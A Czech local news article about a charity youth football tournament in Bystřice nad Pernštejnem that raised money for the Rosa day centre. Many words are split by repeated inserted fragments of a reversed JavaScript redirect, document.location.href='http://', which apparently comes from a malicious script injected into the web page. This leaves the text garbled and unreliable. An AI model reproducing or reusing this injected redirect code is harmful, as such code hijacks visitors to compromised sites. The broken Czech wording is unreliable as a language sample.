Rainbow page separator

Výtěžek z charitativního turnaje pomůže klientům stacionáře

Pondělí, 27. září 2021

Bystřice nad Pernštejnem / V pořadí již osmý ročník charitativního turnaje s názvem Bystřický fotbal pomáhá, konaný pod zášti[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Spor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovního klubu (SK) Bystřice nad Pernštejnem a bystřické radnice, se na sklonku prázdnin uskutečnil na tamním fotbalovém stadionu. Podařilo se při něm vybrat 24 634 korun, které podpoří denní stacionář Rosa zřizovaný Oblastní chari[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou Žďár nad Sázavou. Získané finance poslouží na dofinancování denní dopravy uživatelů do bystřického stacionáře, přičemž veřejná sbírka, kterou je možné podpořit prostřednictvím účtu 219598406/0600, potrvá až do konce roku.
Turnaje s doprovodným programem se zúčastnilo devět týmů mladších přípravek, na hřišti tak hrála téměř s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovka dětí. Ač le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní ročník byl především kvůli epidemiologickým opatřením menšího rozsahu, vydařil se. „V těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to časech, kdy na nás doléhají epidemiologická opatření a postupné snižování finančních prostředků, je pro Rosu jakákoliv finanční pomoc velmi významná. Uvědomujeme si, že dlouhodobá spolupráce s SK Bystřice nad Pernštejnem není samozřejmá. Mnohokrát díky všem, kteří jste se do fotbalového dne zapojili svým skutkem, finančním darem a sportem,“ uvedla vedoucí denního stacionáře Rosa Petra Königová.